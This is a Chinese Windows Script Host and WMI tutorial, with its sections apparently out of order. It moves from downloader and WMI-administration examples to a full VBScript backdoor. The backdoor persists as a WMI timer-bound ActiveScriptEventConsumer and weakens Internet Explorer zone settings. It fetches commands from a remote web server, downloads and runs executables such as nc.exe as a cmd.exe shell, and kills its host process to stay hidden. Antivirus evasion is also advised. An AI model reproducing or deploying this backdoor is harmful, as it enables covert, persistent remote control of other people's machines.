asec.name="stopped_spooler_restart_consumer" ‘定義消費者的名字‘
asec.scriptingengine="vbscript" ‘定義腳本語言(只能是vbscript)‘
asec.scripttext="getobject(""winmgmts:win32_service=‘spooler‘"").startservice" ‘腳本代碼‘
set asecpath=asec.put_ ‘註冊消費者,返回其鏈接‘
set evtflt=getobject(nslink&"__EventFilter").spawninstance_ ‘創建事件過濾器‘
evtflt.name="stopped_spooler_filter" ‘定義過濾器的名字‘
qstr="select * from __instancemodificationevent within 5 " ‘每5秒查詢一次“實例修改事件”‘
qstr=qstr&"where targetinstance isa ""win32_service"" and " ‘目標實例的類是win32_service‘
qstr=qstr&"targetinstance.name=""spooler"" " ‘實例名是spooler‘
qstr=qstr&"and targetinstance.state=""stopped""" ‘實例的state屬性是stopped‘
evtflt.query=qstr ‘定義查詢語句‘
evtflt.querylanguage="wql" ‘定義查詢語言(只能是wql)‘
set fltpath=evtflt.put_ ‘註冊過濾器,返回其鏈接‘
set fcbnd=getobject(nslink&"__FilterToConsumerBinding").spawninstance_ ‘創建過濾器和消費者的綁定‘
fcbnd.consumer=asecpath.path ‘指定消費者‘
fcbnd.filter=fltpath.path ‘指定過濾器‘
fcbnd.put_ ‘執行綁定‘
wscript.echo "安裝完成"
這個腳本的效果是:當“後臺打印”服務(spooler)狀態改變為停止時,消費者將進行處理——重啟spooler。
先net start spooler,然後net stop spooler。最多5秒鐘,spooler又會啟動。
直接運行上面的腳本會出錯,因為“活動腳本事件消費者”(ActiveScriptEventConsumer ASEC)默認沒有被安裝到root/cimv2名字空間。
用記事本打開%windir%/system32/wbem/scrcons.mof,將第一行“#pragma namespace ("////.//Root//Default")”刪除,或者修改為“#pragma namespace ("////.//Root//cimv2")”。XP/2003沒有這一行,不用修改。
然後執行下面這個命令:
C:/WINNT/system32/wbem>mofcomp.exe -N:root/cimv2 scrcons.mof
Microsoft (R) 32-bit MOF 匯編器版本 1.50.1085.0007
版權所有 (c) Microsoft Corp. 1997-1999。保留所有權利。
正在分析 MOF 文件: scrcons.mof
MOF 文件分析成功
將數據儲存到儲備庫中...
已完成!
這樣就把ASEC安裝到root/cimv2了。mofcomp.exe和scrcons.mof都是系統自帶的。
2000默認將ASEC安裝到root/default名字空間,而XP/2003默認已經安裝到root/subscription名字空間,但由於事件過濾器不能跨名字空間捕捉事件(XP/2003可以),事件綁定也不能跨名字空間,而大部分事件都在root/cimv2產生,所以需要重新安裝ASEC到事件源所在的名字空間。下面這個腳本自動完成ASEC重安裝任務。
set shl=createobject("WScript.Shell")
set fso=createobject("Scripting.FileSystemObject")
path=shl.expandenvironmentstrings("%windir%/system32/wbem/")
set mof=fso.opentextfile(path&"scrcons.mof",1,false,-1) ‘mof都是Unicode格式的‘
mofs=mof.readall
mof.close
mofs=replace(mofs,"//Default","//cimv2",1,1) ‘替換默認的名字空間‘
mofp=path&"asecimv2.mof"
set mof=fso.createtextfile(mofp,false,true) ‘創建臨時mof文件‘
mof.write mofs
mof.close
shl.run path&"mofcomp.exe -N:root/cimv2 "&mofp,0,true ‘安裝到root/cimv2‘
fso.deletefile(mofp)
wscript.echo "安裝完成"
註銷永久事件:
nslink="winmgmts://./root/cimv2:"
myconsumer="stopped_spooler_restart_consumer" ‘指定消費者的名字‘
myfilter="stopped_spooler_filter" ‘指定過濾器的名字‘
set binds=getobject(nslink&"__FilterToConsumerBinding").instances_
for each bind in binds
if strcomp(right(bind.consumer,len(myconsumer)+1),myconsumer&chr(34),1)=0 _
and strcomp(right(bind.filter,len(myfilter)+1),myfilter&chr(34),1)=0 then
getobject("winmgmts:"&bind.consumer).delete_ ‘刪除消費者‘
getobject("winmgmts:"&bind.filter).delete_ ‘刪除過濾器‘
bind.delete_ ‘刪除綁定‘
exit for
end if
next
wscript.echo "卸載完成"
除了ASEC,WMI還提供其他永久事件消費者,比如SMTPEventConsumer。當系統出現異常時,可以通過它自動給管理員的信箱發信。WMITools裏的WMI Event Registration用於創建、修改、刪除指定名字空間裏的永久事件消費者、事件過濾器和計時器事件源的實例,以及綁定或解除綁定它們。
關於事件處理機制的各個部分,在《WMI技術指南》裏有詳細的講述,MSDN裏當然更全面。我就點到為止了。
(看累了吧,喝口水,休息一下 ^_^)
下面開始討論腳本後門。
WMI提供了兩個計時器:__AbsoluteTimerInstruction和__IntervalTimerInstruction,分別在指定的時刻和時間間隔觸發事件,註冊一個過濾器來捕獲計時器事件,再和ASEC綁定,我們就獲得了一種少見的程序自啟動的方法。而且,腳本代碼完全隱藏在CIM存儲庫中,不以獨立的文件存在,查殺比較困難。這是腳本後門的優勢,但困難也不少:
1,腳本運行時,由系統自帶的scrcons.exe作為腳本宿主(Windows的設計者還沒有笨到用WMI服務作為腳本宿主)。這就會增加一個進程,雖然是系統正常的進程,殺毒軟件拿它沒轍,但還是太顯眼了。所以,不能讓腳本一直在後臺運行,而是應該每隔一段時間啟動一次,然後盡快結束。腳本結束後,scrcons.exe進程不會自動結束,必須讓腳本借助WMI提供的Win32_Process對象主動終止宿主進程(煮豆燃豆萁?!)。
2,腳本的網絡功能很差,基本上只能依靠Microsoft.XMLHTTP之類的對象。因此,腳本後門不能監聽端口並提供cmd shell,只能反向連接到web服務器,獲取控制命令。一個可行的辦法是,在web服務器上放一個命令文件,腳本後門根據域名找到服務器並下載命令文件,再根據文件內容作出響應。所以,你需要一臺web服務器,或者用netbox等工具建個臨時服務器。當然,你不需要讓服務器總是在線,需要控制腳本後門時再運行就可以了。
3,由於腳本後門間歇式運行,需要防止重復運行同一個命令。解決方法是在註冊表裏記錄命令的長度,每次獲取命令後將長度和記錄做比較,如果相同則跳過,不同則覆蓋並執行命令。
4,為了借助ie對象穿透防火墻,XMLHTTP對象必須在ie中被創建,這會受到Internet域安全級別的限制。即使將代碼保存在html文件中再用ie打開,也不過是“我的電腦”域,創建不安全的ActiveX對象還是會彈出警告對話框。解決辦法是修改註冊表,臨時更改安全設置。
5,WScript對象由wscript.exe或cscript.exe提供,而scrcons.exe沒有提供,所以很多常用的功能,比如WScript.Sleep都不能用了。不能Sleep就無法異步使用XMLHTTP,而同步XMLHTTP可能被長時間阻塞,大大不利於後門的隱蔽。調用ping命令來延時會創建新進程,用WScript.Shell的Popup方法延時則有“咚”一聲提示音。好在Microsoft.XMLHTTP的“親戚”不少,比如Msxml2.XMLHTTP、Msxml2.ServerXMLHTTP、Msxml2.DOMDocument、WinHttp.WinHttpRequest等。最後那個可以設置超時時間,剛好滿足需要。
即使有重重困難,腳本後門仍然值得挑戰一下。當肉雞上的各類木馬紛紛被殺毒軟件肅清後,一個24小時才運行一次的腳本後門可能是你最後的希望。
下面是一個簡單的腳本後門的核心代碼(沒有安裝功能):
cmdu="http://myweb.8866.org/cmd.txt" ‘從web服務器獲取命令的url‘
cmdw=4000 ‘下載超時時間4秒‘
cmdl="HKLM/SOFTWARE/Microsoft/WBEM/CIMOM/CmdLength" ‘記錄命令長度的鍵值名‘
on error resume next ‘忽略非致命錯誤 ‘(調試時註釋掉本行)
set shl=createobject("WScript.Shell") ‘雖然不能使用WScript根對象,其子對象還是可以用的‘
set aso=createobject("ADODB.Stream")
set ie=createobject("InternetExplorer.Application") ‘使用ie繞過防火墻‘
zone="HKCU/SOFTWARE/Microsoft/Windows/CurrentVersion/Internet Settings/Zones/3"
set1=zone&"/1201"
set2=zone&"/1400"
set3=zone&"/CurrentLevel"
val1=shl.regread(set1) ‘保存原來的安全設置‘
val2=shl.regread(set2)
val3=shl.regread(set3)
regd="REG_DWORD"
shl.regwrite set1,0,regd ‘允許在Internet域運行不安全的ActiveX‘
shl.regwrite set2,0,regd ‘允許活動腳本‘
shl.regwrite set3,0,regd ‘設置當前Internet域安全級別為“自定義”‘
ie.visible=0 ‘:ie.visible=1 ‘(調試用)
ie.navigate "about"&":blank" ‘這裏使用字符串連接純屬反論壇過濾‘
ie.document.write _
"<script>function whr(){return new ActiveXObject(‘WinHttp.WinHttpRequest.5.1‘)}</script>"
set whr=ie.document.script.whr() ‘在ie內創建WinHttpRequest對象‘
whr.settimeouts cmdw,cmdw,cmdw,cmdw ‘設置域名解析、連接、發送和接收超時時間‘
whr.open "GET",cmdu,true ‘獲取命令文件‘
whr.send
if not whr.waitforresponse(cmdw) then die
if whr.status>299 then die
rt=whr.responsetext ‘:wscript.echo rt ‘(調試用)
‘:shl.regwrite cmdl,0,regd ‘(調試用)
if len(rt)=shl.regread(cmdl) then die ‘與前一個命令的長度比較‘
shl.regwrite cmdl,len(rt),regd ‘更新命令長度‘
cmds=split(rt,vbcrlf,-1)
if ubound(cmds)<1 then die
cmdt=lcase(trim(cmds(0))) ‘:wscript.echo cmdt ‘(調試用)
aso.type=1
aso.open
cd=shl.currentdirectory&chr(92)
select case cmdt ‘分析命令文件類型‘
case "‘vbs" ‘是vbs‘
execute(rt) ‘直接在當前腳本上下文中執行‘
die
case ":bat" ‘是批處理‘
aso.write whr.responsebody
aso.savetofile cd&"_.bat",2 ‘保存在當前目錄‘
aso.close
shl.run chr(34)&cd&"_.bat""",0 ‘運行批處理‘
die
case "‘wsh" ‘是Windows腳本‘
aso.write whr.responsebody
aso.savetofile cd&"_.vbs",2 ‘保存在當前目錄‘
aso.close
shl.run "cscript.exe """&cd&"_.vbs""",0 ‘使用cscript作為腳本宿主‘
die
case "exe" ‘exe需進一步分析‘
case else die
end select
if ubound(cmds)<4 then die ‘:wscript.echo cmds(1) ‘(調試用)
whr.open "GET",cmds(1),true ‘從指定位置下載exe文件‘
whr.send
if not whr.waitforresponse(cmds(2)) then die
if whr.status>299 then die
path=shl.expandenvironmentstrings(cmds(3))‘展開保存路徑中的環境變量‘
aso.write whr.responsebody ‘:wscript.echo path ‘(調試用)
aso.savetofile path,2 ‘保存exe文件‘
aso.close
shl.run chr(34)&path&""" "&cmds(4),0 ‘執行exe‘
die
sub die
ie.quit
shl.regwrite set1,val1,regd ‘還原Internet域安全設置‘
shl.regwrite set2,val2,regd
shl.regwrite set3,val3,regd
for each ps in getobject("winmgmts://./root/cimv2:win32_process").instances_
if lcase(ps.name)="scrcons.exe" then ps.terminate ‘自殺‘
next
‘wscript.echo "die": wscript.quit ‘(調試用)
end sub
取消調試語句的註釋,上面這段核心代碼就可以直接運行。
它將試圖從myweb.8866.org上獲取cmd.txt,根據裏面的內容進一步行動。
cmd.txt看起來像這樣:
exe //被執行的文件類型,可以是‘vbs、:bat、exe或‘wsh
http://myweb.8866.org/nc.exe //被執行的文件的下載url
4000 //下載超時時間,單位毫秒
%windir%/system32/nc.exe //文件的保存位置,支持環境變量
-L -p 1234 -e cmd.exe //命令行參數
收到上面這個命令後,腳本將從指定url下載nc.exe,保存到系統目錄並運行。
如果第一行的文件類型為‘vbs、‘wsh或:bat,則把命令文件本身當作腳本或批處理來執行。比如:
:bat
net start telnet :啟動telnet服務
del %0 :自刪除
如果只是想讓某臺主機執行命令,可以這樣:
:bat
ipconfig | find "123.45.67.89" && net start telnet
del %0
這樣就只有ip地址為123.45.67.89的主機才會啟動telnet。
‘wsh和‘vbs的區別是,前者保存為文件由cscript.exe調用,後者直接在腳本後門“內部”執行。
使用‘vbs的好處是不用生成文件,而且可以直接利用後門中已經創建的對象,比如shl,但也因此不能用WScript根對象。
下面的‘vbs命令文件把"本地帳戶的共享和安全模式"由"僅來賓"改為"經典"(對XP和2003有效):
‘vbs
shl.regwrite "HKLM/SYSTEM/CurrentControlSet/Control/Lsa/forceguest",0,"REG_DWORD"
註意,vbs和wsh前面都有一個單引號,因為整個命令文件都作為腳本執行,所以必須註釋掉第一行,:bat也是一樣。
使用‘vbs時千萬註意不要有語法錯誤,否則會使後門出錯並停止。如果是復雜的腳本,建議使用‘wsh。
將核心代碼改寫為單行字符串格式,就可以作為ASEC的實例安裝了。改寫時要註意"if"和"end if"配對以及去掉續行符。
完整的安裝腳本代碼如下:
‘***以下為參數配置,請根據情況自行修改***‘
nslink="winmgmts://./root/cimv2:" ‘ASEC所在的名字空間‘
doorname="vbscript_backdoor" ‘記住後門的名字,卸載時需要‘
runinterval=86400000 ‘每天運行一次‘
cmdu="http://myweb.8866.org/cmd.txt" ‘命令文件的位置‘
cmdw=4000 ‘文件下載超時時間‘
cmdl="HKLM/SOFTWARE/Microsoft/WBEM/CIMOM/CmdLength" ‘保存命令長度的鍵值名‘
‘***參數配置結束***‘
createobject("WScript.Shell").regwrite cmdl,0,"REG_DWORD"
‘腳本後門核心代碼‘
stxt="cmdu="""&cmdu&""":cmdw="&cmdw&":cmdl="""&cmdl&""":on error resume next:set shl=createobject(""WScript.Shell""):set aso=createobject(""ADODB.Stream""):set ie=createobject(""InternetExplorer.Application""):zone=""HKCU/SOFTWARE/Microsoft/Windows/CurrentVersion/Internet Settings/Zones/3"":set1=zone&""/1201"":set2=zone&""/1400"":set3=zone&""/CurrentLevel"":val1=shl.regread(set1):val2=shl.regread(set2):val3=shl.regread(set3):regd=""REG_DWORD"":shl.regwrite set1,0,regd:shl.regwrite set2,0,regd:shl.regwrite set3,0,regd:ie.visible=0:ie.navigate ""about""&"":blank"":ie.document.write ""<script>function whr(){return new ActiveXObject(‘WinHttp.WinHttpRequest.5.1‘)}</script>"":with ie.document.script.whr():.settimeouts cmdw,cmdw,cmdw,cmdw:.open ""GET"",cmdu,true:.send:if not .waitforresponse(cmdw) then die:end if:if .status>299 then die:end if:rt=.responsetext:if len(rt)=shl.regread(cmdl) then die:end if:shl.regwrite cmdl,len(rt),regd:cmds=split(rt,vbcrlf,-1):if ubound(cmds)<1 then die:end if:cmdt=lcase(trim(cmds(0))):aso.type=1:aso.open:cd=shl.currentdirectory&chr(92):select case cmdt:case ""‘vbs"":execute(rt):die:case "":bat"":aso.write .responsebody:aso.savetofile cd&""_.bat"",2:aso.close:shl.run chr(34)&cd&""_.bat"""""",0:die:case ""‘wsh"":aso.write .responsebody:aso.savetofile cd&""_.vbs"",2:aso.close:shl.run ""cscript.exe """"""&cd&""_.vbs"""""",0:die:case ""exe"":case else die:end select:if ubound(cmds)<4 then die:end if:.open ""GET"",cmds(1),true:.send:if not .waitforresponse(cmds(2)) then die:end if:if .status>299 then die:end if:path=shl.expandenvironmentstrings(cmds(3)):aso.write .responsebody:aso.savetofile path,2:aso.close:shl.run chr(34)&path&"""""" ""&cmds(4),0:end with:die:sub die:ie.quit:shl.regwrite set1,val1,regd:shl.regwrite set2,val2,regd:shl.regwrite set3,val3,regd:for each ps in getobject(""winmgmts://./root/cimv2:win32_process"").instances_:if lcase(ps.name)=""scrcons.exe"" then ps.terminate:end if:next:end sub"
‘配置事件消費者‘
set asec=getobject(nslink&"ActiveScriptEventConsumer").spawninstance_
asec.name=doorname&"_consumer"
asec.scriptingengine="vbscript"
asec.scripttext=stxt
set asecpath=asec.put_
‘配置計時器‘
set itimer=getobject(nslink&"__IntervalTimerInstruction").spawninstance_
itimer.timerid=doorname&"_itimer"
itimer.intervalbetweenevents=runinterval
itimer.skipifpassed=false
itimer.put_
‘配置事件過濾器‘
set evtflt=getobject(nslink&"__EventFilter").spawninstance_
evtflt.name=doorname&"_filter"
evtflt.query="select * from __timerevent where timerid="""&doorname&"_itimer"""
evtflt.querylanguage="wql"
set fltpath=evtflt.put_
‘綁定消費者和過濾器‘
set fcbnd=getobject(nslink&"__FilterToConsumerBinding").spawninstance_
fcbnd.consumer=asecpath.path
fcbnd.filter=fltpath.path
fcbnd.put_
wscript.echo "安裝完成"
與前一個永久事件處理過程不同的是,腳本後門的事件源是計時器,在每個名字空間都可以實例化並觸發事件。所以,不一定要將ASEC安裝到root/cimv2。特別是XP/2003,ASEC默認已經安裝到root/subscription,只需要相應修改nslink的值,就可以安裝腳本後門了。
卸載腳本後門:
cmdl="HKLM/SOFTWARE/Microsoft/WBEM/CIMOM/CmdLength"
createobject("WScript.Shell").regdelete cmdl ‘刪除保存命令長度的鍵值‘
nslink="winmgmts://./root/cimv2:"
doorname="vbscript_backdoor" ‘根據腳本後門的名字找到各個對象實例‘
myconsumer=doorname&"_consumer"
mytimer=doorname&"_itimer"
myfilter=doorname&"_filter"
set binds=getobject(nslink&"__FilterToConsumerBinding").instances_
for each bind in binds
if strcomp(right(bind.consumer,len(myconsumer)+1),myconsumer&chr(34),1)=0 _
and strcomp(right(bind.filter,len(myfilter)+1),myfilter&chr(34),1)=0 then
bind.delete_
exit for
end if
next
getobject(nslink&"ActiveScriptEventConsumer.Name="""&myconsumer&"""").delete_
getobject(nslink&"__IntervalTimerInstruction.TimerId="""&mytimer&"""").delete_
getobject(nslink&"__EventFilter.Name="""&myfilter&"""").delete_
wscript.echo "卸載完成"
幾點補充說明:
1,腳本後門的優勢在於隱蔽,所以24小時才運行一次是合適的。不用擔心因為系統關機而錯過運行機會,下次啟動時會補上的。
2,為了更好的反查殺,可以給腳本後門的核心代碼加殼。在功能上也可以改進到接近IRC木馬的程度,只不過服務端是Web服務器,不能同時養太多的馬。
3,腳本後門的自啟動和運行依賴於WMI服務,雖然禁用WMI服務就可以杜絕此類後門和木馬,但比起通過註冊表啟動還是可靠的多。如果被蠕蟲病毒利用,恐怕會很麻煩吧。
【結語】
Windows腳本就像萬能膠,能夠把獨立的程序、服務、控件組合起來完成任務。腳本編程的技巧就是組合的技巧。XP和2003比2000自帶更多的命令行工具,WMI也大大加強了,腳本的功能水漲船高,可以說是“只有想不到,沒有做不到”。一切有待你的發掘。
最後,感謝你耐心看完本文,希望本文可以為你學習Windows腳本提供一些幫助。
歡迎來信與我交流 mailto:[email protected]
歡迎訪問幻影旅團 http://www.ph4nt0m.org
【參考資料】
[1] 《Windows腳本技術》 介紹Windows腳本的基礎知識
http://download.microsoft.com/download/win ... 5.6/W982KMe/CN/scd56chs.exe
[2] WMITools 學習腳本必備,包括CIM Studio、Event Registration、Event Viewer和Object Browser四個工具
http://download.microsoft.com/download/.NetStand ... 1.1/NT5XP/EN-US/WMITools.exe
[3] 《WMI技術指南》 出版社:機械工業出版社 作者:Marcin Policht
http://www.huachu.com.cn/itbook/itbookinfo.asp?lbbh=BH99801035
[4] 《System Administration Scripting Guide》 包含大量WMI腳本示例
http://www.sometips.com/soft/script_repository.chm
[5] Script Encoder 官方腳本編碼工具
http://download.microsoft.com/download/win ... .0/WIN98MeXP/CN/sce10chs.exe
[6] 微軟腳本中心
http://www.microsoft.com/china/technet/c ... criptcenter/default.mspx
[7] 《MS Windows Script Host 2.0 Developers Guide》
http://www.sometips.com/soft/wsh.zip
1,前言
2,回顧WSH對象
3,WMI服務
4,腳本也有GUI
5,反查殺
6,來做個後門
7,結語
8,參考資料
【前言】
本文講述一些Windows腳本編程的知識和技巧。這裏的Windows腳本是指"Windows Script Host"(WSH Windows腳本宿主),而不是HTML或ASP中的腳本。前者由Wscript或Cscript解釋,後兩者分別由IE和IIS負責解釋。描述的語言是VBScript。本文假設讀者有一定的Windows腳本編程的基礎。如果你對此還不了解,請先學習《Windows腳本技術》[1]。
【回顧WSH對象】
得益於com技術的支持,WSH能提供比批處理(.bat)更強大的功能。說白了,wsh不過是調用現成的“控件”作為一個對象,用對象的屬性和方法實現目的。
常用的對象有:
WScript
Windows腳本宿主對象模型的根對象,要使用WSH自然離不開它。它提供多個子對象,比如WScript.Arguments和WScript.Shell。前者提供對整個命令行參數集的訪問,後者可以運行程序、操縱註冊表內容、創建快捷方式或訪問系統文件夾。
Scripting.FileSystemObject
主要為IIS設計的對象,訪問文件系統。這個恐怕是大家遇到最多的對象了,因為幾乎所有的Windows腳本病毒都要通過它復制自己感染別人。
ADODB.Stream
ActiveX Data Objects數據庫的子對象,提供流方式訪問文件的功能。這雖然屬於數據庫的一部分,但感謝微軟,ADO是系統自帶的。
Microsoft.XMLHTTP
為支持XML而設計的對象,通過http協議訪問網絡。常用於跨站腳本執行漏洞和SQL injection。
還有很多不常見的:
活動目錄服務接口(ADSI)相關對象 —— 功能涉及範圍很廣,主要用於Windows域管理。
InternetExplorer對象 —— 做IE能做的各種事。
Word,Excel,Outlook對象 —— 用來處理word文檔,excel表單和郵件。
WBEM對象 —— WBEM即Web-Based Enterprise Management。它為管理Windows提供強大的功能支持。下一節提到的WMI服務提供該對象的接口。
很顯然,WSH可以利用的對象遠遠不止這些。本文掛一漏萬,談一些較實用的對象及其用法。
先看一個支持斷點續傳下載web資源的例子,它用到了上面說的4個常用對象。
if (lcase(right(wscript.fullname,11))="wscript.exe") then ‘判斷腳本宿主的名稱‘
die("Script host must be CScript.exe.") ‘腳本宿主不是CScript,於是就die了‘
end if
if wscript.arguments.count<1 then ‘至少要有一個參數‘
die("Usage: cscript webdl.vbs url [filename]") ‘麻雀雖小五臟俱全,Usage不能忘‘
end if
url=wscript.arguments(0) ‘參數數組下標從0開始‘
if url="" then die("URL can‘t be null.") ‘敢唬我,空url可不行‘
if wscript.arguments.count>1 then ‘先判斷參數個數是否大於1‘
filename=wscript.arguments(1) ‘再訪問第二個參數‘
else ‘如果沒有給出文件名,就從url中獲得‘
t=instrrev(url,"/") ‘獲得最後一個"/"的位置‘
if t=0 or t=len(url) then die("Can not get filename to save.") ‘沒有"/"或以"/"結尾‘
filename=right(url,len(url)-t) ‘獲得要保存的文件名‘
end if
if not left(url,7)="http://" then url=&qu ... t;&url ‘如果粗心把“http://”忘了,加上'
set fso=wscript.createobject("Scripting.FileSystemObject") ‘FSO,ASO,HTTP三個對象一個都不能少‘
set aso=wscript.createobject("ADODB.Stream")
set http=wscript.createobject("Microsoft.XMLHTTP")
if fso.fileexists(filename) then ‘判斷要下載的文件是否已經存在‘
start=fso.getfile(filename).size ‘存在,以當前文件大小作為開始位置‘
else
start=0 ‘不存在,一切從零開始‘
fso.createtextfile(filename).close ‘新建文件‘
end if
wscript.stdout.write "Connectting..." ‘好戲剛剛開始‘
current=start ‘當前位置即開始位置‘
do
http.open "GET",url,true ‘這裏用異步方式調用HTTP‘
http.setrequestheader "Range","bytes="&start&"-"&cstr(start+20480) ‘斷點續傳的奧秘就在這裏‘
http.setrequestheader "Content-Type:","application/octet-stream"
http.send ‘構造完數據包就開始發送‘
for i=1 to 120 ‘循環等待‘
if http.readystate=3 then showplan() ‘狀態3表示開始接收數據,顯示進度‘
if http.readystate=4 then exit for ‘狀態4表示數據接受完成‘
wscript.sleep 500 ‘等待500ms‘
next
if not http.readystate=4 then die("Timeout.") ‘1分鐘還沒下完20k?超時!‘
if http.status>299 then die("Error: "&http.status&" "&http.statustext) ‘不是吧,又出錯?‘
if not http.status=206 then die("Server Not Support Partial Content.") ‘服務器不支持斷點續傳‘
aso.type=1 ‘數據流類型設為字節‘
aso.open
aso.loadfromfile filename ‘打開文件‘
aso.position=start ‘設置文件指針初始位置‘
aso.write http.responsebody ‘寫入數據‘
aso.savetofile filename,2 ‘覆蓋保存‘
aso.close
range=http.getresponseheader("Content-Range") ‘獲得http頭中的"Content-Range"‘
if range="" then die("Can not get range.") ‘沒有它就不知道下載完了沒有‘
temp=mid(range,instr(range,"-")+1) ‘Content-Range是類似123-456/789的樣子‘
current=clng(left(temp,instr(temp,"/")-1)) ‘123是開始位置,456是結束位置‘
total=clng(mid(temp,instr(temp,"/")+1)) ‘789是文件總字節數‘
if total-current=1 then exit do ‘結束位置比總大小少1就表示傳輸完成了‘
start=start+20480 ‘否則再下載20k‘
loop while true
wscript.echo chr(13)&"Download ("&total&") Done." ‘下載完了,顯示總字節數‘
function die(msg) ‘函數名來自Perl內置函數die‘
wscript.echo msg ‘交代遺言^_^‘
wscript.quit ‘去見馬克思了‘
end function
function showplan() ‘顯示下載進度‘
if i mod 3 = 0 then c="/" ‘簡單的動態效果‘
if i mod 3 = 1 then c="-"
if i mod 3 = 2 then c="/"
wscript.stdout.write chr(13)&"Download ("¤t&") "&c&chr(8)‘13號ASCII碼是回到行首,8號是退格‘
end function
可以看到,http控件的功能是很強大的。通過對http頭的操作,很容易就實現斷點續傳。例子中只是單線程的,事實上由於http控件支持異步調用和事件,也可以實現多線程下載。在MSDN裏有詳細的用法。至於斷點續傳的詳細資料,請看RFC2616。
FSO和ASO都可以訪問文件,他們有什麽區別呢?其實,ASO除了在訪問字節(非文本)數據有用外,就沒有存在的必要了。如果想把例子中的ASO用FSO來實現,那麽寫入http.responsebody的時候會出錯。反之也不行,ASO無法判斷文件是否存在。如果文件不存在,loadfromfile就直接出錯,沒有改正的機會。當然,可以用on error resume next語句讓腳本宿主忽略非致命錯誤,自己捕捉並處理。但有現成的fileexists()為什麽不用呢?
另外,由於FSO經常被腳本病毒和ASP木馬利用,所以管理員可能會在註冊表中修改該控件的信息,使腳本無法創建FSO。其實執行一個命令regsvr32 /s scrrun.dll就恢復了。即使scrrun.dll被刪除,自己復制一個過去就行。
熱身完之後,下面我們來看一個功能強大的對象——WBEM(由WMI提供)。
【WMI服務】
先看看MSDN裏是怎麽描述WMI的——Windows 管理規範 (WMI) 是可伸縮的系統管理結構,它采用一個統一的、基於標準的、可擴展的面向對象接口。我在剛開始理解WMI的時候,總以為WMI是"Windows管理接口"(Interface),呵呵。
再看什麽是WMI服務——提供共同的界面和對象模式以便訪問有關操作系統、設備、應用程序和服務的管理信息。如果此服務被終止,多數基於Windows的軟件將無法正常運行。如果此服務被禁用,任何依賴它的服務將無法啟動。
看上去似乎是個很重要的服務。不過,默認情況下並沒有服務依賴它,反而是它要依賴RPC和EventLog服務。但它又是時常用到的。我把WMI服務設置為手動啟動並停止,使用電腦一段時間,發現WMI服務又啟動了。被需要就啟動,這是服務設置為“手動”的特點。當我知道WMI提供的管理信息有多龐大後,對WMI服務的自啟動就不感到奇怪了。
想直觀了解WMI的復雜,可以使用WMITools.exe[2]這個工具。這是一個工具集。使用其中的WMI Object Browser可以看到很多WMI提供的對象,其復雜程度不亞於註冊表。更重要的是,WMI還提供動態信息,比如當前進程、服務、用戶等。
WMI的邏輯結構是這樣的:
首先是WMI使用者,比如腳本(確切的說是腳本宿主)和其他用到WMI接口的應用程序。由WMI使用者訪問CIM對象管理器WinMgmt(即WMI服務),後者再訪問CIM(公共信息模型Common Information Model)儲存庫。靜態或動態的信息(對象的屬性)就保存在CIM庫中,同時還存有對象的方法。一些操作,比如啟動一個服務,通過執行對象的方法實現。這實際上是通過COM技術調用了各種dll。最後由dll中封裝的API完成請求。
WMI是事件驅動的,操作系統、服務、應用程序、設備驅動程序等都可作為事件源,通過COM接口生成事件通知。WinMgmt捕捉到事件,然後刷新CIM庫中的動態信息。這也是為什麽WMI服務依賴EventLog的原因。
說完概念,我們來看看具體如何操作WMI接口。
下面這個例子的代碼來自我寫的腳本RTCS。它是遠程配置telnet服務的腳本。
這裏只列出關鍵的部分:
首先是創建對象並連接服務器:
set objlocator=createobject("wbemscripting.swbemlocator")
set objswbemservices=objlocator.connectserver(ipaddress,"root/default",username,password)
第一句創建一個服務定位對象,然後第二句用該對象的connectserver方法連接服務器。
除了IP地址、用戶名、密碼外,還有一個名字空間參數root/default。
就像註冊表有根鍵一樣,CIM庫也是分類的。用面向對象的術語來描述就叫做“名字空間”(Name Space)。
由於RTCS要處理NTLM認證方式和telnet服務端口,所以需要訪問註冊表。而操作註冊表的對象在root/default。
set objinstance=objswbemservices.get("stdregprov") ‘實例化stdregprov對象‘
set objmethod=objinstance.methods_("SetDWORDvalue") ‘SetDWORDvalue方法本身也是對象‘
set objinparam=objmethod.inparameters.spawninstance_() ‘實例化輸入參數對象‘
objinparam.hdefkey=&h80000002 ‘根目錄是HKLM,代碼80000002(16進制)‘
objinparam.ssubkeyname="SOFTWARE/Microsoft/TelnetServer/1.0" ‘設置子鍵‘
objinparam.svaluename="NTLM" ‘設置鍵值名‘
objinparam.uvalue=ntlm ‘設置鍵值內容,ntlm是變量,由用戶輸入參數決定‘
set objoutparam=objinstance.execmethod_("SetDWORDvalue",objinparam) ‘執行方法‘
然後設置端口
objinparam.svaluename="TelnetPort"
objinparam.uvalue=port ‘port也是由用戶輸入的參數‘
set objoutparam=objinstance.execmethod_("SetDWORDvalue",objinparam)
看到這裏你是不是覺得有些頭大了呢?又是名字空間,又是類的實例化。我在剛開始學習WMI的時候也覺得很不習慣。記得我的初中老師說過,讀書要先把書讀厚,再把書讀薄。讀厚是因為加入了自己的想法,讀薄是因為把握要領了。
我們現在就把書讀薄。上面的代碼可以改為:
set olct=createobject("wbemscripting.swbemlocator")
set oreg=olct.connectserver(ip,"root/default",user,pass).get("stdregprov")
HKLM=&h80000002
out=oreg.setdwordvalue(HKLM,"SOFTWARE/Microsoft/TelnetServer/1.0","NTLM",ntlm)
out=oreg.setdwordvalue(HKLM,"SOFTWARE/Microsoft/TelnetServer/1.0","TelnetPort",port)
現在是不是簡單多了?
接著是對telnet服務狀態的控制。
set objswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password)
set colinstances=objswbemservices.execquery("select * from win32_service where name=‘tlntsvr‘")
這次連接的是root/cimv2名字空間。然後采用wql(sql for WMI)搜索tlntsvr服務。熟悉sql語法的一看就知道是在做什麽了。這樣得到的是一組Win32_Service實例,雖然where語句決定了該組總是只有一個成員。
為簡單起見,假設只要切換服務狀態。
for each objinstance in colinstances
if objinstance.started=true then ‘根據started屬性判斷服務是否已經啟動‘
intstatus=objinstance.stopservice() ‘是,調用stopservice停止服務‘
else
intstatus=objinstance.startservice() ‘否,調用startservice啟動服務‘
end if
next
關鍵的代碼就是這些了,其余都是處理輸入輸出和容錯的代碼。
總結一下過程:
1,連接服務器和合適的名字空間。
2,用get或execquery方法獲得所需對象的一個或一組實例。
3,讀寫對象的屬性,調用對象的方法。
